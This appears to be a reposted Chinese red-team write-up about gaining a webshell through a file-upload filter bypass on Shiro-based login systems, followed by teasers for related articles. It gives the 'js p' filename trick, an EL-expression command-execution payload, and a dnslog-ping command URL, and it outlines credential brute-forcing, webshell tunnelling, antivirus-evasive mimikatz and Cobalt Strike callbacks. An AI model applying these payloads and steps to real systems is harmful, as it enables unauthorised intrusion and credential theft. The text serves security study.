Bypass文件上传绕过-Getshell

VSole2023-04-13 09:56:04

前言

某次小型红蓝,直接丢过来几个登陆框,定点打。

环境介绍

全部都是shiro框架。

都是Windows 2012系统

只有登陆框。

过程


爆破

用户名密码,都是加密的。
查看网页源代码的时候,发现其中一个利用的DES-ECB的单层加密。可以看到key。(可以爆)
利用burp-Crypto插件,把key写进去,点击add即可

然后,爆破选择这个加密即可。
经过大量字典,发现目标用户名规则为名字全称
zhangsan/lisi
果断生成大量的字段。
爆破出几个用户名,打算访问的时候,提示没有应用权限。
我的超大字典,都没有爆破出一个有效的账号。

一上午毫无收获,陷入沉思。

只有登陆框/shiro框架/js读取/

目标不能扫描/不能打旁站等。

打工人还是先干饭。

干饭的时候,突然想起来。

竟然都是同一家,会不会账号也是通用的?
用上午在A系统登陆显示没有应用权限的账号,
去B系统/C系统/D系统登陆尝试。
果然。在B系统和C系统有账号可以登陆。

文件上传

zhangsan账号登陆。直接寻找文件上传的地方。

1

压缩包上传/
可以上传,也有路径回显。但是不会自动解压,没有找到可以利用的点。

2. 文件导入功能。

进行尝试

返回包,包含网站绝对路径。

1.jpg  访问404
1.txt  访问404
1.jsp(绕过在后面) 访问404
等等
返回包都包含网站路径了,就是访问不到。
接下来尝试文件路径寻找。无果。

又没有思路了。

喝杯水,突然想起来是不是用户问题。

换一个账号wangwu进行登陆。

模块一样。

直接进行文件导入。

1.jpg 404
2.txt 404

突然感觉这个点要结束,无法上传。

想着试试jsp吧。

后缀绕过
filename="1.js p"  
js后面加一个空格即可
内容为:123

发现这个jsp竟然可以访问到。

小记
1.访问404是账号权限问题
2.目标文件上传只有jsp能解析等才可以访问到。

尝试上传马。

发现目标对文件内容检查

内容检测
检测内容为:
<不能直接跟内容
 被拦截
< jsp:scriptlet>   <加空格 可以上传成功,但是这貌似不符合语法,无法解析。
内容检测-绕过1

利用常用的脏字符(不多说)

内容检测-绕过2
发现有表哥谈论过jsp利用EL表达式绕过。
本地尝试

EL表达式内容为

${Runtime.getRuntime().exec(param.cmd)}
jsp的EL表达式是一种没有回显的,
这里先借助dnslog测试。
刚开始访问时500.一直以为是语法问题,百度也没有找到解决办法。
但是后来发现可以调用。

dnslog测试,成功收到

用法

http://localhost:8080/web_test/helloworld.jsp?cmd=ping 08zocw.dnslog.cn

目标是Windows系统。是否可以powershell直接上线呢
本地 测试,成功上线

管理工具连接问题

cs本地可以上线,但是想到我们双方都是内网,无法直接cs上线,
利用脏字符上传马,之后无法连接。

解决办法

1.冰蝎3.3和哥斯拉都无法连接,这里采用冰蝎2。
2.连接时,需要带cookie才可以访问。但是目标cookie变化有点快。有时候存在突然中断,只能手动换cookie

流量代理

1.因为这里双方都是内网的情况下,这里代理采用http协议reGeorg进行代理。

这里需要带cookie去访问

但是不知道为啥,过一会就直接中断,可能和cookie有关,未解决。

2.最终想起来冰蝎3自带的代理挺好用,但是冰蝎3.3无法连接马。

想:是不是新版本就可以了。
下载了最新的版本,发现可以连接。
利用冰蝎3自带的http协议代理成功。

简单的内网渗透

发现目标存在火绒。
利用免杀minikatz读取目标hash。hash为空,无法登陆。
绕过火绒添加用户。
成功登陆。

如何上线

关闭目标火绒,cs上线也是曲折的,可能有别的软件。

1.利用免杀分离免杀上线。
2.powershell免杀上线。
在目标机器部署了cs。然后本地成功上线。(需要免杀)

总结


1.不同系统相同用户的用法。
2.不同用户对文件上传文件访问权限的不同。
3.文件上传后缀和内容的绕过
4.http隧道用法
5.绕过火绒的免杀(mimikazt/添加用户/上线免杀)
cookie文件上传
本作品采用《CC 协议》,转载必须注明作者和本文链接
十大常见web漏洞
2021-10-23 05:12:42
SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。
前言前几天对自己学校进行的一次渗透测试,由于深信服过于变态,而且拦截会直接封ip,整个过程有点曲折期间进行了后缀名绕过,jspx命名空间绕过、获取网站根目录、base64五层编码写入shell等操作0x01 获取网站接口主界面:上传点:由于该应用是内嵌企业微信的套皮Html,所以我们首先用Burp Suite抓包获取接口和cookie任意文件上传:文件名强制命名为code+学号,后缀为最后一次点号出现之后的字母0x02 后缀名绕过代码不限制后缀名,但是waf限制呀!
前言某次小型红蓝,直接丢过来几个登陆框,定点打。环境介绍全部都是shiro框架。过程爆破用户名密码,都是加密的。查看网页源代码的时候,发现其中一个利用的DES-ECB的单层加密。果断生成大量的字段。我的超大字典,都没有爆破出一个有效的账号。一上午毫无收获,陷入沉思。用上午在A系统登陆显示没有应用权限的账号,但是不会自动解压,没有找到可以利用的点。在目标机器部署了cs。
最近由于笔者所在的研发集团产品需要,需要支持高性能的大文件(大都数是4GB以上)的http上传,并且要求支持http断点续传。笔者在以前的博客如何实现支持大文件的高性能HTTP文件上传服务器已经介绍了实现大文件上传的一些基本概念,其实非常简单,这里在简要归纳一下,方便记忆:
Fuxploider是一种开源渗透测试工具,可自动检测和利用文件上传表单缺陷的过程。该工具能够检测允许上传的文件类型,并能够检测哪种技术最适合在所需的Web服务器上上传Web Shell或任何恶意文件
这篇文章主要是通过前端JS来寻找接口进行测试,寻找漏洞成功进入后台后,进行后台文件上传html。仅供学习。
总部位于伦敦的铁路旅行服务公司 Trainline 的安全工程师 Aidan Marlin 在通过 HackerOne 报告了他的发现,并被 GitHub 代表告知“我们用户暴露的凭据不在范围内后,提醒 The Register 这些文件的公开可用性。我们的漏洞赏金计划”。Marlin 然后问他是否可以公开他的发现,并被告知他可以自由这样做。
VSole
网络安全专家